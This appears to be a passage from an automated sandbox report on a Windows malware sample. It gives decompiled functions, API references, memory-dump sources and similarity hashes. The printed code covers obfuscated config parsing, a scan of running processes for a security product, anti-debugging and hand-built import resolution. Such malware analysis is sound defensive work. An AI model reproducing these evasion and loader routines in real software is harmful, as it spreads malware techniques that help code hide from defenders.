				if(E001DA4D4( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x1dd2a0; // 0x63699bc3
						_t31 = E001D7FC0(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x1dd240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x1dd2a0; // 0x63699bc3
						_t32 = E001D7FC0(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x1dd244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x1dd2a0; // 0x63699bc3
						_t33 = E001D7FC0(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x1dd248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x1dd2a0; // 0x63699bc3
						_t34 = E001D7FC0(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x1dd004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x1dd2a0; // 0x63699bc3
						_t35 = E001D7FC0(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							E001DD02C = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x1dd2a0; // 0x63699bc3
						_t36 = E001D7FC0(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E001D89D2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E001D5DDD();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x1dd2a0; // 0x63699bc3
						_t37 = E001D7FC0(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E001D89D2(0, _t37) != 0) {
						_t102 =  *0x1dd32c; // 0x2fa95b0
						E001D804C(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x1dd2a0; // 0x63699bc3
						_t38 = E001D7FC0(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x1dd2a4; // 0x2dca5a8
						_t18 = _t39 + 0x1de252; // 0x616d692f
						 *0x1dd2d0 = _t18;
						goto L52;
					} else {
						_t49 = E001D89D2(0, _t38);
						 *0x1dd2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x1dd2a0; // 0x63699bc3
								_t41 = E001D7FC0(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x1dd2a4; // 0x2dca5a8
								_t19 = _t42 + 0x1de791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E001D89D2(0, _t41);
							}
							 *0x1dd340 = _t43;
							HeapFree( *0x1dd238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}

0x001d696a
0x001d696d
0x001d698d
0x001d699b
0x001d699b
0x001d69a0
0x001d69ba
0x001d6bb8
0x001d6bba
0x00000000
0x001d69c0
0x001d69c0
0x001d69c7
0x001d69dd
0x001d69c9
0x001d69c9
0x001d69d6
0x001d69d6
0x001d69e7
0x001d69e9
0x001d69f3
0x001d69f8
0x001d69f8
0x001d69f3
0x001d69ff
0x001d6a15
0x001d6a01
0x001d6a01
0x001d6a0e
0x001d6a0e
0x001d6a19
0x001d6a1b
0x001d6a25
0x001d6a2a
0x001d6a2a
0x001d6a25
0x001d6a31
0x001d6a47
0x001d6a33
0x001d6a33
0x001d6a40
0x001d6a40
0x001d6a4b
0x001d6a4d
0x001d6a57
0x001d6a5c
0x001d6a5c
0x001d6a57
0x001d6a63
0x001d6a79
0x001d6a65
0x001d6a65
0x001d6a72
0x001d6a72
0x001d6a7d
0x001d6a7f
0x001d6a89
0x001d6a8e
0x001d6a8e
0x001d6a89
0x001d6a95
0x001d6aab
0x001d6a97
0x001d6a97
0x001d6aa4
0x001d6aa4
0x001d6aaf
0x001d6ab1
0x001d6abb
0x001d6ac0
0x001d6ac0
0x001d6abb
0x001d6ac7
0x001d6add
0x001d6ac9
0x001d6ac9
0x001d6ad6
0x001d6ad6
0x001d6ae1
0x001d6ae3
0x001d6ae6
0x001d6ae7
0x001d6aee
0x001d6af0
0x001d6af1
0x001d6af1
0x001d6aee
0x001d6af8
0x001d6b0e
0x001d6afa
0x001d6afa
0x001d6b07
0x001d6b07
0x001d6b12
0x001d6b20
0x001d6b2a
0x001d6b2a
0x001d6b31
0x001d6b47
0x001d6b33
0x001d6b33
0x001d6b40
0x001d6b40
0x001d6b4b
0x001d6b5e
0x001d6b5e
0x001d6b63
0x001d6b69
0x00000000
0x001d6b4d
0x001d6b50
0x001d6b55
0x001d6b5c
0x001d6b6e
0x001d6b70
0x001d6b86
0x001d6b72
0x001d6b72
0x001d6b7f
0x001d6b7f
0x001d6b8a
0x001d6b96
0x001d6b9b
0x001d6b9b
0x001d6b8c
0x001d6b8f
0x001d6b8f
0x001d6ba9
0x001d6bae
0x001d6bbb
0x001d6bbf
0x001d6bbf
0x00000000
0x001d6b5c
0x001d6b4b

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D69EF
StrToIntExA.SHLWAPI(00000000,00000000,?,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D6A21
StrToIntExA.SHLWAPI(00000000,00000000,?,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D6A53
StrToIntExA.SHLWAPI(00000000,00000000,?,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D6A85
StrToIntExA.SHLWAPI(00000000,00000000,?,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D6AB7
HeapFree.KERNEL32(00000000,001D5D85,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D6BAE

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4b25d8737787ea5f73079f13706dda019b43bcf7e79cd0b72a385336e5247876
Instruction ID: 2db6b1d92e4b91867c8e68038f0a01f184303c34830090228d0dc306e47a5d17
Opcode Fuzzy Hash: 4b25d8737787ea5f73079f13706dda019b43bcf7e79cd0b72a385336e5247876
Instruction Fuzzy Hash: 19618F70B12114AECB20EBB8ADC9C6B77EDEB887007744927A441E7359FB34DD858B21

Uniqueness

Uniqueness Score: -1.00%

Function 6E28150C, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6E2856C7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E2856DC
UnhandledExceptionFilter.KERNEL32(6E2AFA48), ref: 6E2856E7
GetCurrentProcess.KERNEL32(C0000409), ref: 6E285703
TerminateProcess.KERNEL32(00000000), ref: 6E28570A

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 788efda50812f887afd7825c6a3145e86c3dd754309af492bc074fc826170125
Instruction ID: 526dc63793b17d5a37da057f743e3237281c9d7fc359027ad85e1321952faa65
Opcode Fuzzy Hash: 788efda50812f887afd7825c6a3145e86c3dd754309af492bc074fc826170125
Instruction Fuzzy Hash: 2C2116B8900A08DFCF81CF68C94C6457BB6FB0AB06F50481AEA0A8738CE7B45585CF75

Uniqueness

Uniqueness Score: -1.00%

Function 001D7F56, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E001D7F56() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x1dd2a4; // 0x2dca5a8
						_t2 = _t9 + 0x1dee54; // 0x73617661
						_push( &_v264);
						if( *0x1dd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x001d7f61
0x001d7f6b
0x001d7f6f
0x001d7f79
0x001d7faa
0x001d7f80
0x001d7f85
0x001d7f92
0x001d7f9b
0x001d7fb2
0x001d7f9d
0x001d7fa5
0x00000000
0x001d7fa5
0x001d7fb3
0x001d7fb4
0x00000000
0x001d7fb4
0x00000000
0x001d7fae
0x001d7fba
0x001d7fbf

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001D7F66
Process32First.KERNEL32(00000000,?), ref: 001D7F79
Process32Next.KERNEL32(00000000,?), ref: 001D7FA5
CloseHandle.KERNEL32(00000000), ref: 001D7FB4

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 2f6c52ae7d1472da1b3eb94620205d128cfc3c7252ffec477df0f91b0d93a1be
Instruction ID: b5adb058173ce8b5f559197d8436ce7dd3a983fe54ffc541125136cb56739123
Opcode Fuzzy Hash: 2f6c52ae7d1472da1b3eb94620205d128cfc3c7252ffec477df0f91b0d93a1be
Instruction Fuzzy Hash: E1F0F032206125AACB30A7769C09EFBB7ACDFC4310F000163F929C2284FB30CD8686B1

Uniqueness

Uniqueness Score: -1.00%

Function 6E241CDD, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E241CDD() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e244130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e24413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e24412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e244128 = _t5;
						 *0x6e244130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e244124 = _t6;
						if(_t6 == 0) {
							 *0x6e244124 =  *0x6e244124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6e241cde
0x6e241cec
0x6e241cf2
0x6e241cf9
0x6e241d50
0x6e241d50
0x6e241cfb
0x6e241d03
0x6e241d10
0x6e241d10
0x6e241d4c
0x6e241d4e
0x00000000
0x00000000
0x00000000
0x6e241d05
0x6e241d0c
0x6e241d12
0x6e241d12
0x6e241d17
0x6e241d25
0x6e241d2a
0x6e241d30
0x6e241d36
0x6e241d3d
0x6e241d3f
0x6e241d3f
0x6e241d49
0x6e241d0e
0x6e241d0e
0x00000000
0x6e241d0e
0x6e241d0c

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E241243,74B063F0), ref: 6E241CEC
GetVersion.KERNEL32 ref: 6E241CFB
GetCurrentProcessId.KERNEL32 ref: 6E241D17
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E241D30

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: beebc36e4bd4571a9a9f62b8b2f06cbbe5f85eda5881f1cc7f9c5e00572af893
Instruction ID: 7a2e98fb073727105e6c84ef88682d32e738a18fb033aebc7586cf0b66e8f0b9
Opcode Fuzzy Hash: beebc36e4bd4571a9a9f62b8b2f06cbbe5f85eda5881f1cc7f9c5e00572af893
Instruction Fuzzy Hash: 29F081B0554B12DBEF5A7FA8EC1E7403BA3B70B712F140215E985DA1C4D3A08082CF28

Uniqueness

Uniqueness Score: -1.00%

Function 6E2417FA, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E2417FA(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e244140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e2417fa
0x6e241803
0x6e241808
0x6e24180e
0x6e241817
0x6e24181d
0x6e24181f
0x6e241822
0x6e241827
0x6e24182e
0x6e24182e
0x6e241832
0x6e241838
0x6e24183d
0x00000000
0x00000000
0x6e241843
0x6e24184d
0x6e24184f
0x6e241852
0x6e241855
0x6e241859
0x6e241861
0x6e241863
0x6e241866
0x6e2418ce
0x6e2418ce
0x6e2418d2
0x00000000
0x00000000
0x6e24186b
0x6e241871
0x6e241873
0x6e241886
0x6e241889
0x6e241889
0x6e241889
0x6e24188d
0x6e241875
0x6e241875
0x6e24187d
0x6e24187f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24187f
0x6e24186d
0x6e24186d
0x6e241881
0x6e241881
0x6e241881
0x6e241890
0x6e241893
0x6e241895
0x6e24189c
0x6e241897
0x6e241897
0x6e241897
0x6e2418a4
0x6e2418aa
0x6e2418ac
0x6e2418dc
0x6e2418ae
0x6e2418ae
0x6e2418b1
0x6e2418b3
0x6e2418bb
0x6e2418bb
0x6e2418c0
0x6e2418c2
0x6e2418c9
0x6e2418cb
0x6e2418cb
0x6e2418cb
0x00000000
0x6e2418cb
0x00000000
0x6e2418ac
0x6e24185b
0x6e24185b
0x6e24185f
0x00000000
0x00000000
0x6e24185f
0x6e2418df
0x6e2418df
0x6e2418e6
0x6e2418eb
0x00000000
0x00000000
0x6e2418f1
0x6e2418fc
0x00000000
0x6e2418fc
0x6e2418f3
0x6e2418f3
0x6e2418f9
0x00000000
0x6e2418f9
0x6e241827
0x6e2418fd
0x6e241902

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E241832
GetProcAddress.KERNEL32(?,00000000), ref: 6E2418A4

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 82db91fc4bce5312230c92eb6a6128654570c1b24c4eb849fda85a083a1bac97
Instruction ID: 2029e26d564abdf1a17111f061f9f8e8cac17cff2998304b1914aa3d175c5bd3
Opcode Fuzzy Hash: 82db91fc4bce5312230c92eb6a6128654570c1b24c4eb849fda85a083a1bac97
Instruction Fuzzy Hash: 42315C71E1020FDFEB08CF99C884AAEB7F6BF04341B2040A9D811E7240E770DA98CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D1B6A, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E001D1B6A(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
